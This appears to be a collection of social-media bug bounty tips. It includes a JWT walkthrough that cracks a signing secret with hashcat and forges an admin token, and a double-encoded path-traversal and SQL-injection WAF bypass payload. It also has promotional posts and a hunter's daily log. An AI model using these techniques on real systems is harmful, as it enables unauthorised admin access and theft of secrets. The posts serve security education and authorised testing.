Trciks: #jwt
+ Locate the user's JWT tokens. `eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyX2lkIjoxLCJ1c2VybmFtZSI6ImpvaG4iLCJyb2xlIjoidXNlciIsImV4cCI6MTc3NjI2MTEwMywiaWF0IjoxNzc2MTc0NzAzLCJpc3MiOiJsYWJzIn0.02A44jncvea5se0PFhIAzJ-mo4iFT-xVNsEB-dt6_EY`
+ Crack this JWT password using hashcat.
```hashcat -a 0 -m 16500 'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyX2lkIjoxLCJ1c2VybmFtZSI6ImpvaG4iLCJyb2xlIjoidXNlciIsImV4cCI6MTc3NjI2MTEwMywiaWF0IjoxNzc2MTc0NzAzLCJpc3MiOiJsYWJzIn0.02A44jncvea5se0PFhIAzJ-mo4iFT-xVNsEB-dt6_EY' /usr/share/wordlists/rockyou.txt```
hashcat output
```
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyX2lkIjoxLCJ1c2VybmFtZSI6ImpvaG4iLCJyb2xlIjoidXNlciIsImV4cCI6MTc3NjI2MTEwMywiaWF0IjoxNzc2MTc0NzAzLCJpc3MiOiJsYWJzIn0.02A44jncvea5se0PFhIAzJ-mo4iFT-xVNsEB-dt6_EY:supersecret
```
Using the cracked `supersecret` key, change the `"role":"user"` value in the JWT payload to `"role":"admin"` and create a new token.
Use this token to send a request to the admin panel to gain access.
```
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyX2lkIjoxLCJ1c2VybmFtZSI6ImpvaG4iLCJyb2xlIjoiYWRtaW4iLCJleHAiOjE3NzYyNjExMDMsImlhdCI6MTc3NjE3NDcwMywiaXNzIjoibGFicyJ9.MRREDujcdiBRgCEj8O9pnpK1R8AlTfgx0eG5LBCMZC4
```
**Payload**
```
{
"user_id": 1,
"username": "john",
"role": "admin",
"exp": 1776261103,
"iat": 1776174703,
"iss": "labs"
}
```
#bugbounty #xss #cybersecurity #websecurity #sqli #infosec #redteam #AppSec #hacking #cybersecuritytips #bugbountytips #informationdisclousure #jwt
Bug Bounty Tip 🐞
Some WAFs fail during URL normalization.
Try bypass techniques like:
• Double encoding (%252f)
• Unusual / nested paths
Example:
/api/v1/%2e%2e/%2e%2e/config?id=1%252bUNION%252bSELECT%252bsecrets--
Always test only on authorized systems 🛡️
💡 Tip: Always use the FindSomething extension!
You can often discover exposed credentials that lead to admin panel access, unauthorized entry, and critical vulnerabilities.
Credit: @mooo_sec#InfoSec#BugBounty#SecurityTips#bugbountytips
🔍 Unlock the secrets of the web with "The Art of Web Reconnaissance: Bug Bounty & Ethical Hacking"! 🌐💻
📌 What you'll learn:
- Advanced web reconnaissance techniques
- Identifying and exploiting vulnerabilities
- Best practices for ethical hacking
- Real-world bug bounty hunting tips
Course link : https://t.co/iZUEe4Qywl
#bugbounty #bugbountytips #bugbountytip #hackerone #bugcrowd #infosec #cybersecurity #pentesting #redteam #informationsecurity #securitycipher #technology #coding #code #recon #ai #llm #owasp
Day 27 - Bug Bounty
1. Clicking every button and features to get used to the app
2. Testing idor on endpoints with "id" but got no luck
3. Testing csrf by removing csrf token on endpoints but got no luck
Total earned: 1832$